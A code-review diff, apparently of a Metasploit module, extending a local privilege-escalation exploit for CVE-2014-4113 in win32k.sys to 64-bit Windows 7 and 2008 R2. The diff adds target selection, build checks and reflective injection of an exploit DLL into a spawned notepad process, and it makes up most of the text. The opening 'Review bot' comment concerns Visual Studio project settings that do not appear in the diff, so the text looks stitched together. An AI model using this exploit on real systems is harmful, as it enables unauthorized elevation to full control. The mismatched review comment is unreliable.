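Review bot: The `Release|x64` `<ClCompile>` group sets `<CompileAs>` twice, first `CompileAsC` and then `Default`, so the later value takes effect and this configuration no longer forces C compilation the way `Debug|x64` and the Win32 groups do; drop the `<CompileAs>Default</CompileAs>` line. The same group carries `<Optimization>Disabled</Optimization>`, which looks copied from the `Debug|x64` block rather than a deliberate Release setting; compare it with the `Release|Win32` group, whose optimization settings fall outside this hunk.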
@ -24,15 +24,17 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
can be triggered through the use of TrackPopupMenu. Under special conditions, the
|
can be triggered through the use of TrackPopupMenu. Under special conditions, the
|
||||||
NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary
|
NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary
|
||||||
code execution. This module has been tested successfully on Windows XP SP3, Windows
|
code execution. This module has been tested successfully on Windows XP SP3, Windows
|
||||||
2003 SP2, Windows 7 SP1 and Windows 2008 32bits.
|
2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows
|
||||||
|
2008 R2 SP1 64 bits.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'Unknown', # vulnerability discovery and exploit in the wild
|
'Unknown', # vulnerability discovery and exploit in the wild
|
||||||
'juan vazquez' # msf module
|
'juan vazquez', # msf module (x86 target)
|
||||||
|
'Spencer McIntyre' # msf module (x64 target)
|
||||||
],
|
],
|
||||||
'Arch' => ARCH_X86,
|
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'SessionTypes' => [ 'meterpreter' ],
|
'SessionTypes' => [ 'meterpreter' ],
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' =>
|
||||||
|
@ -46,14 +48,18 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
# * Windows 2003 SP2
|
# * Windows 2003 SP2
|
||||||
# * Windows 7 SP1
|
# * Windows 7 SP1
|
||||||
# * Windows 2008
|
# * Windows 2008
|
||||||
[ 'Windows 32 bits', { } ]
|
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
|
||||||
|
# Tested on (64 bits):
|
||||||
|
# * Windows 7 SP1
|
||||||
|
# * Windows 2008 R2 SP1
|
||||||
|
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
|
||||||
],
|
],
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'Space' => 4096,
|
'Space' => 4096,
|
||||||
'DisableNops' => true
|
'DisableNops' => true
|
||||||
},
|
},
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
['CVE', '2014-4113'],
|
['CVE', '2014-4113'],
|
||||||
['OSVDB', '113167'],
|
['OSVDB', '113167'],
|
||||||
|
@ -73,11 +79,27 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
return Exploit::CheckCode::Unknown
|
return Exploit::CheckCode::Unknown
|
||||||
end
|
end
|
||||||
|
|
||||||
|
if sysinfo["Architecture"] =~ /(wow|x)64/i
|
||||||
|
arch = ARCH_X86_64
|
||||||
|
elsif sysinfo["Architecture"] =~ /x86/i
|
||||||
|
arch = ARCH_X86
|
||||||
|
end
|
||||||
|
|
||||||
file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
|
file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
|
||||||
major, minor, build, revision, branch = file_version(file_path)
|
major, minor, build, revision, branch = file_version(file_path)
|
||||||
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
|
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
|
||||||
|
|
||||||
Exploit::CheckCode::Detected
|
# Neither target suports Windows 8 or 8.1
|
||||||
|
return Exploit::CheckCode::Safe if build == 9200
|
||||||
|
return Exploit::CheckCode::Safe if build == 9600
|
||||||
|
|
||||||
|
if arch == ARCH_X86
|
||||||
|
return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
|
||||||
|
else
|
||||||
|
return Exploit::CheckCode::Detected if build == 7601
|
||||||
|
end
|
||||||
|
|
||||||
|
return Exploit::CheckCode::Unknown
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
@ -85,10 +107,16 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
fail_with(Exploit::Failure::None, 'Session is already elevated')
|
fail_with(Exploit::Failure::None, 'Session is already elevated')
|
||||||
end
|
end
|
||||||
|
|
||||||
|
if check == Exploit::CheckCode::Safe
|
||||||
|
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
|
||||||
|
end
|
||||||
|
|
||||||
if sysinfo["Architecture"] =~ /wow64/i
|
if sysinfo["Architecture"] =~ /wow64/i
|
||||||
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
|
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
|
||||||
elsif sysinfo["Architecture"] =~ /x64/
|
elsif sysinfo["Architecture"] =~ /x64/ && target.arch.first == ARCH_X86
|
||||||
fail_with(Failure::NoTarget, 'Running against 64-bit systems is not supported')
|
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
|
||||||
|
elsif sysinfo["Architecture"] =~ /x86/ && target.arch.first == ARCH_X86_64
|
||||||
|
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status('Launching notepad to host the exploit...')
|
print_status('Launching notepad to host the exploit...')
|
||||||
|
@ -104,7 +132,13 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
||||||
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4113', 'cve-2014-4113.x86.dll')
|
if target.arch.first == ARCH_X86
|
||||||
|
dll_file_name = 'cve-2014-4113.x86.dll'
|
||||||
|
else
|
||||||
|
dll_file_name = 'cve-2014-4113.x64.dll'
|
||||||
|
end
|
||||||
|
|
||||||
|
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4113', dll_file_name)
|
||||||
library_path = ::File.expand_path(library_path)
|
library_path = ::File.expand_path(library_path)
|
||||||
|
|
||||||
print_status("Injecting exploit into #{process.pid}...")
|
print_status("Injecting exploit into #{process.pid}...")
|
||||||
|
|
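Review bot: In `check`, `arch` stays `nil` when `sysinfo["Architecture"]` matches neither `/(wow|x)64/i` nor `/x86/i`, and the following `if arch == ARCH_X86 ... else` then takes the x64 branch and can return `Detected` on build 7601 for an unrecognised architecture. Return early instead, e.g. `return Exploit::CheckCode::Unknown if arch.nil?` before the build checks, or narrow the second branch to `elsif arch == ARCH_X86_64`. The comment `# Neither target suports Windows 8 or 8.1` has a typo (`supports`). `check` begins before this hunk.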